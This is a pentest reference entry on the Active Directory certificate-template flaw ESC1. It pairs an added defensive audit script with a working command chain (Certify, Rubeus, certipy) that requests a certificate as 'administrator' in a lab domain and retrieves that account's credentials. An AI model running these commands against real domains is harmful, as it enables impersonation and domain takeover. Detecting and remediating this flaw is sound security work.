ESC1
If a certificate template allows the enrollee to supply a SAN (subjectAltName) that differs from the identity of the user submitting the CSR (certificate signing request), it allows requesting a certificate as any user in the domain.
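The following audit script is an added example for the template condition just described; it is not code from the original page or from Certify, Rubeus or certipy. It evaluates constructed template records shaped like the LDAP attributes of pKICertificateTemplate objects (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage). The flag bit values, the EKU OID list, the set of "low-privileged" principals and the template records themselves are assumptions made for the example and are not taken from the page; the only template name reused from the page is Template1.

```python
# Audit of certificate templates for the ESC1 condition: the enrollee may
# supply the subject/SAN, and the resulting certificate can be used for
# domain authentication. Constructed example data; not real domain output.

# Bit in msPKI-Certificate-Name-Flag that lets the enrollee supply the subject.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag that requires CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that permit authentication (assumed list; the page does not enumerate it).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# Principals treated as low-privileged for the enrollment check (assumption).
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers"}

# Constructed template records. Template1 mirrors the misconfiguration the
# page describes; the other two show states that do not satisfy ESC1.
SAMPLE_TEMPLATES = [
    {
        "name": "Template1",
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll": ["Domain Users"],
    },
    {
        "name": "HardenedTemplate1",   # same as Template1, SAN bit cleared
        "msPKI-Certificate-Name-Flag": 0,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll": ["Domain Users"],
    },
    {
        "name": "WebServerOnly",       # enrollee supplies SAN, but EKU is server auth only
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
        "enroll": ["Domain Users"],
    },
]


def esc1_findings(template):
    """Return the list of ESC1 conditions a template satisfies."""
    findings = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject/SAN")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("manager approval disabled")
    if template["msPKI-RA-Signature"] == 0:
        findings.append("no authorized signatures required")
    ekus = set(template["pKIExtendedKeyUsage"])
    # An empty EKU list is treated as unrestricted (assumption).
    if not ekus or ekus & AUTH_EKUS:
        findings.append("EKU permits authentication")
    if LOW_PRIV_PRINCIPALS & set(template["enroll"]):
        findings.append("low-privileged principals can enroll")
    return findings


def is_esc1_vulnerable(template):
    """All five conditions must hold together for ESC1 to apply."""
    return len(esc1_findings(template)) == 5


def audit(templates):
    """Names of templates that need remediation."""
    return [t["name"] for t in templates if is_esc1_vulnerable(t)]


def remediate(template):
    """Copy of the template with the enrollee-supplies-subject bit cleared,
    which removes the condition the page describes."""
    fixed = dict(template)
    fixed["msPKI-Certificate-Name-Flag"] &= ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    return fixed


if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        print(t["name"], "->", esc1_findings(t))
    print("needs fixing:", audit(SAMPLE_TEMPLATES))
```

Clearing the subject-name bit is only one remediation; requiring manager approval or removing authentication EKUs from a template that does not need them also breaks the chain, and the findings list shows which of the five conditions is the cheapest to remove for a given template.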
Windows
Certificate Request with alternative SAN
PS /home/bobbuilder> .\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:Template1 /altname:administrator@lab.local
Convert the certificate from PEM to PFX
Certificate Authentication
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap
Linux
Certificate Request with alternative SAN
bobbuilder[/home]$ certipy req -u user1@local.lab -p "pass1" -ca lab-LOCAL-DC-CA -template Template1 -upn administrator@local.lab -dc-ip 10.10.10.10
bobbuilder:bobbuilder[/home#home]$ certipy req -u user1@local.lab -p 'pass1' -ca lab-LOCAL-DC-CA -upn Administrator -template Template1 -dc-ip 10.10.10.10
Note: If we get the error "The NETBIOS connection with the remote host timed out", just try again.
Certificate Authentication
bobbuilder:bobbuilder[/home#home]$ certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10